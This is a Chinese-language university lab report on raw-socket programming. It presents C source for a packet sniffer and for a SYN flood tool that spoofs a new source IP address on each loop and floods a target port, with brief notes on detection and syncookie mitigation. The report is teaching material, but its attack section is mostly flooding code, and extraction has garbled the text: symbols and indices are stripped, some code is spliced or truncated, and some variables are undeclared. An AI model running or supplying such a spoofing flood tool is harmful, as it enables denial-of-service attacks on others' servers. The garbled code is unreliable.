1、课程名称信息安全产品开发实践 实验课时4实验项目原始套接字实验时间实验目的利用原始套接字实现一个TCP SYN flooding 程序实验环境虚拟机 Red Hat Enterprise Linux-VMware Workstation实验内容算法、程序、步骤和方法 由于我们在这次实验中只需要对IP和TCP头部进行修改,所以使用的是网络层原始套接字。 这个实验考验的是对IP和TCP报头结构体的了解,其实在之前的实验我们就已经有所接触,在嗅探器中我们就是把接收到的数据包进行分解,分别先后解封IP头部,再解封TCP头部(越底层的数据越放在前面)。这一部分知识可以参考教师的demo程序packet.c
2、,那是一个使用链路层套接字的嗅探器,不过在输出ip地址那局部需要改动一下才能正常运行。下面把修改后的packet展示一下:#include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv) int sock, n; char buffer2048; struct ethhdr *eth; struct iphdr *iph; struct tcphdr *tcph; if (0(sock=socket(PF_PACKET,
3、 SOCK_RAW, htons(ETH_P_IP) perror(socket); exit(1); int num = 1; while (1) printf(=n); /注意:在这之前我没有调用bind函数,原因是什么呢? n = recvfrom(sock,buffer,2048,0,NULL,NULL); printf(number: %d ,num+); printf(%d bytes readn,n); /接收到的数据帧头6字节是目的MAC地址,紧接着6字节是源MAC地址。 eth=(struct ethhdr*)buffer; printf(Dest MAC addr:%02x
4、:%02x:%02x:%02x:%02x:%02xn,eth-h_dest0,eth-h_dest1,eth-h_dest2,eth-h_dest3,eth-h_dest4,eth-h_dest5); printf(Source MAC addr:%02x:%02x:%02x:%02x:%02x:%02xn,eth-h_source0,eth-h_source1,eth-h_source2,eth-h_source3,eth-h_source4,eth-h_source5); iph=(struct iphdr*)(buffer+sizeof(struct ethhdr); /我们只对IPV4
5、且没有选项字段的IPv4报文感兴趣 / if(iph-version =4 & iph-ihl = 5) if(iph-version =4)char addr_p1INET_ADDRSTRLEN;char addr_p2INET_ADDRSTRLEN;inet_ntop(AF_INET,&iph-saddr,addr_p1,sizeof(addr_p1);inet_ntop(AF_INET,&iph-daddr,addr_p2,sizeof(addr_p2); printf(Source host:%sn,addr_p1); printf(Dest host:%sn,addr_p2); if
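6、(iph-protocol=6)/TCP tcph=(struct tcphdr*)(buffer+sizeof(struct ether_header)+sizeof(struct ip); printf(Sourport:%dn,ntohs(tcph-source); printf(Destport :%dn,ntohs(tcph-dest); 这里主要修改的地方是:1、 原代码问题:在输出ip那部分需要利用inet_ntop函数,不然程序运行出问题。2、 加入了TCP头部解封,输出源端口和目的端口,当然还要把相应的头文件加入。 需要注意的是,从代码看修改后只判断了version为4而不再判断ihl为5,TCP头部的位置却仍按固定的sizeof(struct ip)计算,因此遇到带选项字段的IP报文时端口会解析错误,应改用iph->ihl*4作为IP头部长度,并先确认recvfrom返回的字节数足以容纳各层头部再做类型转换。 其实只要把上面这程序和这次的syn flood结合起来再做点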
7、修改就可以做出一个syn端口扫描器。接上实验内容算法、程序、步骤和方法而这次的syn flood程序中做的就是和嗅探器相反的工作:先封装IP头部,再封装TCP头部。程序的主要流程就是:构造IP头部→构造TCP头部→发送数据。这是一个循环的过程(不停发送syn攻击),里面需要注意:1、 TCP头部中syn要标记为1,其它皆为0。 2、每循环一次,伪装的源IP地址就要改一次,那IP头部的校验和就要重新计算,当底层的报头(IP头部)有所改变,那上层的头部(TCP头部)的校验和同样要重新计算。有关检验部分,在运行syn flood程序之前,必须先运行一个服务器程序来作为攻击目标。被攻击一方的表现是监听端口上堆积大量处于SYN_RECV状态的半开连接,这也是检测SYN flood的常用依据,Linux上可通过开启net.ipv4.tcp_syncookies来缓解。关于观测端口连接情况,教师提供的是ne
8、tstat -tn,如果想看得更加方便的话,可以使用netstat -tn | grep “:888这样来监视某个端口。#include /printf #include /memset #include /for exit(0); #include #include /For errno - the error number #include #include /hostend #include #include /Provides declarations for tcp header #include /Provides declarations for ip header unsign
9、ed short csum(unsigned short * , int ); struct pseudo_header /needed for checksum calculation unsigned int source_address; unsigned int dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; struct tcphdr tcp; ; struct in_addr dest_ip; int main(int argc, char *ar
10、gv) /Create a raw socket int s = socket (AF_INET, SOCK_RAW , IPPROTO_TCP); if(s 0) printf (Error creating socket. Error number : %d . Error message : %s n , errno , strerror(errno); exit(0); else printf(Socket created.n); /Datagram to represent the packet char datagram4096; /IP header struct iphdr *
11、iph = (struct iphdr *) datagram; /TCP header struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip); struct sockaddr_in dest; struct pseudo_header psh; char *target = argv1; if(argc 3) printf(Please specify a hostname and a port n); exit(1); /get the target ip dest_ip.s_addr = inet_a
12、ddr( target ); /IP_HDRINCL to tell the kernel that headers are included in the packet int one = 1; const int *val = &one; if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one) ihl = 5; iph-version = 4; iph-tos = 0; iph-tot_len = sizeof (struct ip) + sizeof (struct tcphdr); iph-id = htons (543
13、21); /Id of this packet iph-frag_off = htons(16384); iph-ttl = 64; iph-protocol = IPPROTO_TCP; iph-check = 0; /Set to 0 before calculating checksum iph-saddr = sour_ip.s_addr; /Spoof the source ip address iph-daddr = dest_ip.s_addr; iph-check = csum (unsigned short *) datagram, iph-tot_len 1); /TCP
14、Header tcph-source = htons ( source_port ); tcph-dest = htons (atoi(argv2); tcph-seq = htonl(1105024978); tcph-ack_seq = 0; tcph-doff = sizeof(struct tcphdr) / 4; /Size of tcp header tcph-fin=0; tcph-syn=1; tcph-rst=0; tcph-psh=0; tcph-ack=0; tcph-urg=0; tcph-window = htons ( 14600 ); / maximum allo
15、wed window size tcph-check = 0; /if you set a checksum to zero, your kernels IP stack should fill in the correct checksum during transmission tcph-urg_ptr = 0; tcph-check = 0; / if you set a checksum to zero, your kernels IP stack should fill in the correct checksum during transmission psh.source_ad
16、dress = sour_ip.s_addr; psh.dest_address = dest.sin_addr.s_addr; psh.placeholder = 0; psh.protocol = IPPROTO_TCP; psh.tcp_length = htons( sizeof(struct tcphdr) ); memcpy(&psh.tcp , tcph , sizeof (struct tcphdr); tcph-check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header); dest.sin_fami
17、ly = AF_INET; dest.sin_addr.s_addr = dest_ip.s_addr; /Send the packet if ( sendto (s, datagram , sizeof(struct iphdr) + sizeof(struct tcphdr) , 0 , (struct sockaddr *) &dest, sizeof (dest) 1) sum+=*ptr+; nbytes-=2; if(nbytes=1) oddbyte=0; *(u_char*)&oddbyte)=*(u_char*)ptr; sum+=oddbyte; sum = (sum16)+(sum & 0xffff); sum = sum + (sum16); answer=(short)sum; return(answer); 下面让我们看一下运行效果:运行syn flood程序,使用不同的伪装IP攻击:然后检验结果:数据记录和计算 结 论结 果通过小 结 这次实验虽然不难,但是比较重要,如果只是单纯地制作普通的网络程序的话,一般的socket编程足以完成,但是如果想深入探究网络服务本身,想利用rfc的规则制造底层的扫描器、嗅探器、防火墙、网络攻击等等,学习网络底层的编程知识很重要。指导教师评 议 成绩评定: 指导教师签名: